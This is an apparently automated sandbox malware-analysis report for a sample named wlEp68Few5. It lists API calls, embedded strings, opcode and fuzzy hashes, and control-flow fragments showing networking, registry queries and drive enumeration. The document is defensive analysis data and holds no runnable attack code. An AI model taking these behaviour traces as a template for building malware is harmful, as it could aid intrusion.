                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: setsockopt
                                                      • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                      • API String ID: 3981526788-2373386790
                                                      • Opcode ID: 6100f23f802b5409d051d73ca1bbf4bba3253efcea11746aa8e72ad9f1691392
                                                      • Instruction ID: 3b403fbf322c145d9b47d6022d120b8a262ea11c4aecf20f25dc1ae84e634d1f
                                                      • Opcode Fuzzy Hash: 6100f23f802b5409d051d73ca1bbf4bba3253efcea11746aa8e72ad9f1691392
                                                      • Instruction Fuzzy Hash: 52621571504340ABE721CF14C846BABB3E4FFA2318F04491EF98897292E779E855CB97

                                                      Control-flow Graph
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00539946
                                                      • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00539974
                                                      • RegCloseKey.KERNELBASE(?), ref: 0053998B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                      • API String ID: 3677997916-615551945
                                                      • Opcode ID: c8cd8ebb13d497cb0bc0de6820d281a36585221997b55909789f2176e1e4c64a
                                                      • Instruction ID: 1010fd060d5dd4d1a84093ea04cab2c36889874009d4831d0e92f6d4cb64935a
                                                      • Opcode Fuzzy Hash: c8cd8ebb13d497cb0bc0de6820d281a36585221997b55909789f2176e1e4c64a
                                                      • Instruction Fuzzy Hash: F932A6F5904202ABEB11AB24EC47A1BBFA4BF95314F084838F90996263F771ED14D793

                                                      Control-flow Graph

                                                      APIs
                                                      • connect.WS2_32(?,?,00000001), ref: 004A8C30
                                                      • SleepEx.KERNELBASE(00000000,00000000), ref: 004A8CF3
                                                      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 004A8D0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: Sleepconnectgetsockopt
                                                      • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                      • API String ID: 1669343778-879669977
                                                      • Opcode ID: 3159bff87f1b232dbd4ccf4fb7a2b4bc2b9e68f672fdfce1203b18076c93c734
                                                      • Instruction ID: 64b9849e2276cb01fc5d59d4efe27920a531996bb295b5ac449870a09841949c
                                                      • Opcode Fuzzy Hash: 3159bff87f1b232dbd4ccf4fb7a2b4bc2b9e68f672fdfce1203b18076c93c734
                                                      • Instruction Fuzzy Hash: 61B1AF70604705AFD710DF24C885BA7B7A0EF66318F04892EF8598B3D2DB78E855CB66

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: EnumOpen
                                                      • String ID: d
                                                      • API String ID: 3231578192-2564639436
                                                      • Opcode ID: d3c18362f92fdf9ec4aa6fec70dfbe1793682c555c5078fd2b9291a52fae003f
                                                      • Instruction ID: 392816f6dc9413e11cf050735c732a02fec88c6e22fa8b38c8e4409db543c4e5
                                                      • Opcode Fuzzy Hash: d3c18362f92fdf9ec4aa6fec70dfbe1793682c555c5078fd2b9291a52fae003f
                                                      • Instruction Fuzzy Hash: FF71B4B49043199FDB50DF69D58479EBBF0FF84318F10886DE89897311E7749A888F92

                                                      Control-flow Graph

                                                      APIs
                                                      • send.WS2_32(multi.c,?,?,?,N=G,00000000,?,?,004807BF), ref: 004776EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID: LIMIT %s:%d %s reached memlimit$N=G$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                      • API String ID: 2809346765-821333934
                                                      • Opcode ID: db9c0aa73f2a04e23c88eacde707b2b3121f567ab280ad3eb3f115870b7e8b27
                                                      • Instruction ID: 387308bbbfab1f6b8071f94ba152818b209ab266aa593a280ba1fd7c3efceb95
                                                      • Opcode Fuzzy Hash: db9c0aa73f2a04e23c88eacde707b2b3121f567ab280ad3eb3f115870b7e8b27
                                                      • Instruction Fuzzy Hash: 36113AF1648314BBD5209755BC8AE7B3B9CEBC2B2CF854919FC0C23342E1A69D0182B2

                                                      Control-flow Graph

                                                      APIs
                                                      • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 004A935C
                                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 004A9389
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: Ioctlsetsockopt
                                                      • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                      • API String ID: 1903391676-2691795271
                                                      • Opcode ID: 9ef85573f94f79cda0996b3d7efde408b557a88df296f22e77b133faf3714d05
                                                      • Instruction ID: 017cb31854bd8c36d51f63e89ee3ae3fbeb62ca1168127621cbb7cc85dc37fc2
                                                      • Opcode Fuzzy Hash: 9ef85573f94f79cda0996b3d7efde408b557a88df296f22e77b133faf3714d05
                                                      • Instruction Fuzzy Hash: 8A51D270604305ABEB10DF24C881FAAB7A5FF99318F14852AFD488B382D735ED51CB95

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 6e43c92693d363401882f58e88fab1648fe8db708c39aae4ed6309c4ca74c299
                                                      • Instruction ID: d4bb2469b8a51431d9d099888b5e12214fc9812ce9da422e7ef992e571573949
                                                      • Opcode Fuzzy Hash: 6e43c92693d363401882f58e88fab1648fe8db708c39aae4ed6309c4ca74c299
                                                      • Instruction Fuzzy Hash: CBA1BDFB26C121BC710A85452B54BFA6B6EE4CBA30B32847BF807D65C2E3D54B4E51B1

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 85f618f1b21b7367246148cd9b2a790e4ad64626d596ea1ee3fbdb68d5de62f0
                                                      • Instruction ID: d1d921ff6573ea74b9a3a139050bd43f9c87b385bd471736030160197f60c054
                                                      • Opcode Fuzzy Hash: 85f618f1b21b7367246148cd9b2a790e4ad64626d596ea1ee3fbdb68d5de62f0
                                                      • Instruction Fuzzy Hash: F5A1BEFB26C121BC710A85552B54BFB6B6EE4CBA30B32842BF807D65C2E3D54B4E51B1

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 50168b4875a73d306e548dc6c33a86d7198394a38f86e8bffdcc64d242bc3732
                                                      • Instruction ID: 5221b2f444a6436384b2f4fb356e11eb9e0e7b8b886aaf51e90cfeb39567a2ee
                                                      • Opcode Fuzzy Hash: 50168b4875a73d306e548dc6c33a86d7198394a38f86e8bffdcc64d242bc3732
                                                      • Instruction Fuzzy Hash: 7491BEFB26C121BC710685552B54BFA6B6EE4CBA30B32842BF807D65C2E3D54B4E51B1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1840 7100928-7100b8b 1867 7100b99-7100bca call 7100bd2 1840->1867 1871 7100bcc-7100bcd 1867->1871 1872 7100b8f-7100b97 1867->1872 1873 7100b8d 1871->1873 1874 7100bcf-7100d29 call 7100cbc GetLogicalDrives 1871->1874 1872->1867 1873->1872 1890 7100d35-7100dc9 call 7100dd7 1874->1890 1899 7100e42-7100fa9 1890->1899 1900 7100dcb-7100e3f 1890->1900 1900->1899
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: e3650ec9fe1d5821c13d44547b6aaf2246d94bca801f49baefe6a7964737509a
                                                      • Instruction ID: 2086924f84507d4ca273dab1dbb94332fb59891fa64bc7dbf5d5ba7da437a916
                                                      • Opcode Fuzzy Hash: e3650ec9fe1d5821c13d44547b6aaf2246d94bca801f49baefe6a7964737509a
                                                      • Instruction Fuzzy Hash: 1291DDFB26C121BC710A85552B54BFA6B6EE4CBB30B32842BF807D65C2E3D54B4E51B1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2001 7100956-7100b8b 2026 7100b99-7100bca call 7100bd2 2001->2026 2030 7100bcc-7100bcd 2026->2030 2031 7100b8f-7100b97 2026->2031 2032 7100b8d 2030->2032 2033 7100bcf-7100d29 call 7100cbc GetLogicalDrives 2030->2033 2031->2026 2032->2031 2049 7100d35-7100dc9 call 7100dd7 2033->2049 2058 7100e42-7100fa9 2049->2058 2059 7100dcb-7100e3f 2049->2059 2059->2058
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 2a5a40e44050e99dcc38366f0aca96eba7e25b4e967f900e0fb9cca2ea637274
                                                      • Instruction ID: 3aacfca32ab59c7f46d1c516d8aeaa74b93129b1f26443408141bf574dbb1522
                                                      • Opcode Fuzzy Hash: 2a5a40e44050e99dcc38366f0aca96eba7e25b4e967f900e0fb9cca2ea637274
                                                      • Instruction Fuzzy Hash: 2191CCFB26C121BCB10685452B54BFA6B6EE5CBA30B32842BF807D65C2E3D54B4E51B1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2079 710098c-7100b8b 2101 7100b99-7100bca call 7100bd2 2079->2101 2105 7100bcc-7100bcd 2101->2105 2106 7100b8f-7100b97 2101->2106 2107 7100b8d 2105->2107 2108 7100bcf-7100d29 call 7100cbc GetLogicalDrives 2105->2108 2106->2101 2107->2106 2124 7100d35-7100dc9 call 7100dd7 2108->2124 2133 7100e42-7100fa9 2124->2133 2134 7100dcb-7100e3f 2124->2134 2134->2133
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: dcdc6ef8f3639dbca47984e29930fb0c2ff9c4b714a8a95681d8273c2b2745d4
                                                      • Instruction ID: 092525337728d9828fb40d4ae7d9dbebde9866f3d77988b3c5f51f19cb29a7c0
                                                      • Opcode Fuzzy Hash: dcdc6ef8f3639dbca47984e29930fb0c2ff9c4b714a8a95681d8273c2b2745d4
                                                      • Instruction Fuzzy Hash: 2891DDFB26C121BC710A85552B54BFA6B6EE4CBB30B32842BF807D65C2E3D54B4E51B1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2154 710099b-7100b8b 2174 7100b99-7100bca call 7100bd2 2154->2174 2178 7100bcc-7100bcd 2174->2178 2179 7100b8f-7100b97 2174->2179 2180 7100b8d 2178->2180 2181 7100bcf-7100d29 call 7100cbc GetLogicalDrives 2178->2181 2179->2174 2180->2179 2197 7100d35-7100dc9 call 7100dd7 2181->2197 2206 7100e42-7100fa9 2197->2206 2207 7100dcb-7100e3f 2197->2207 2207->2206
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 9b72d2db765a277fad53ef52cc240307d4fd7bdb6e5706df4d7be447cf70912c
                                                      • Instruction ID: 46d843135bb7b91298280ea63cef4717a1081e551ab3ed96eed93ab7d66fbabe
                                                      • Opcode Fuzzy Hash: 9b72d2db765a277fad53ef52cc240307d4fd7bdb6e5706df4d7be447cf70912c
                                                      • Instruction Fuzzy Hash: 5491F0FB16C121BCA20685552B54BFA6B6EE4CBB30732847BF403D65C2E3D54B4E51B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 381d65168aeae369ebb67e1aa1c283b30c6bebe2f97de343958d1edc48416c01
                                                      • Instruction ID: 1be9a4ba618b3475ef33e83271f6ea0e1d5488ac2ee811484025b22210f66903
                                                      • Opcode Fuzzy Hash: 381d65168aeae369ebb67e1aa1c283b30c6bebe2f97de343958d1edc48416c01
                                                      • Instruction Fuzzy Hash: 7C9133FB16C121BCA20685552B54BFA6B7EE4CBA30732846BF803D65C2E3D54B4E52B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 6bfa3541ff8f5ad96bb28bac22eccc678478bfd08c689be2061fae0e96e9acee
                                                      • Instruction ID: 997780627db090d6a3941129b3dfcdd1b80d4b54357fe9e7e3ed250a1d9821d3
                                                      • Opcode Fuzzy Hash: 6bfa3541ff8f5ad96bb28bac22eccc678478bfd08c689be2061fae0e96e9acee
                                                      • Instruction Fuzzy Hash: AF91DEFB16C121BC610685552B54BFA6B6EE4CBA30B32843BF807D65C2E3D54B4E51B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: a332827597081def19659d2c5442bcaec93ffe074df4eda7ffd7364f4f39ea2f
                                                      • Instruction ID: 4b546eb94632526c1b5d956ddab42aca3fdb78def8b4ee07f2ca6c747f6b5dba
                                                      • Opcode Fuzzy Hash: a332827597081def19659d2c5442bcaec93ffe074df4eda7ffd7364f4f39ea2f
                                                      • Instruction Fuzzy Hash: 2781FEFB16C121BCA10685552B54BFA6B6EE4CBA30B32843BF803D65C2E3D54B4E51B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 8119488ad575bdf980c714ee4ab79cc1e5d6c3bb8fd725fcec55f34a23ab3840
                                                      • Instruction ID: 65ba14d8e6c21c9e3d78e0995e381e7ae336920dd96f3b555db387e445943546
                                                      • Opcode Fuzzy Hash: 8119488ad575bdf980c714ee4ab79cc1e5d6c3bb8fd725fcec55f34a23ab3840
                                                      • Instruction Fuzzy Hash: D681F0FB16C121BCA20685952B54BFA6B6EE4CBB30732843BF807D65C2E3D54B4E51B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 61137a55e009701cfb4fb689c8089e8e58f243da1c755da8937ff0299737b685
                                                      • Instruction ID: 4bca7f71f35b59d5a0ce53d0bf31a6e6ecae8bd4750428b75865baa606ce61f3
                                                      • Opcode Fuzzy Hash: 61137a55e009701cfb4fb689c8089e8e58f243da1c755da8937ff0299737b685
                                                      • Instruction Fuzzy Hash: 8681FFFB16C121BCA10A85452B54BFA6B6EE4CBB30B32843BF807D65C2E3D54B4E51B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 2e9cf6ee128fd89e01546793f667608ac507bd8acd09bf60ef3ed5d240d0ec15
                                                      • Instruction ID: e8163aa5fb13a92d5b037eeba51d403104fd89428c67c53b5c39f14d46290d22
                                                      • Opcode Fuzzy Hash: 2e9cf6ee128fd89e01546793f667608ac507bd8acd09bf60ef3ed5d240d0ec15
                                                      • Instruction Fuzzy Hash: 768101FB16C121BD610681952B54BFA6B6EE4CBB30B32843BF803D65C2E3D54B4E51B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 287dc164d79f65b2b0448392379440a9fde6803c7a97743b6c4d8088d55d6547
                                                      • Instruction ID: 073769a86e89d2569fd54c595e7d376eca1f6d90ceff4cb7a0ac3d6d3572ef5b
                                                      • Opcode Fuzzy Hash: 287dc164d79f65b2b0448392379440a9fde6803c7a97743b6c4d8088d55d6547
                                                      • Instruction Fuzzy Hash: 89810EFB16C121BCA10685952B54BFA6B7EE4CBA30732847BF803D65C2E3D54B4E52B1
                                                      Strings
                                                      Memory Dump Source
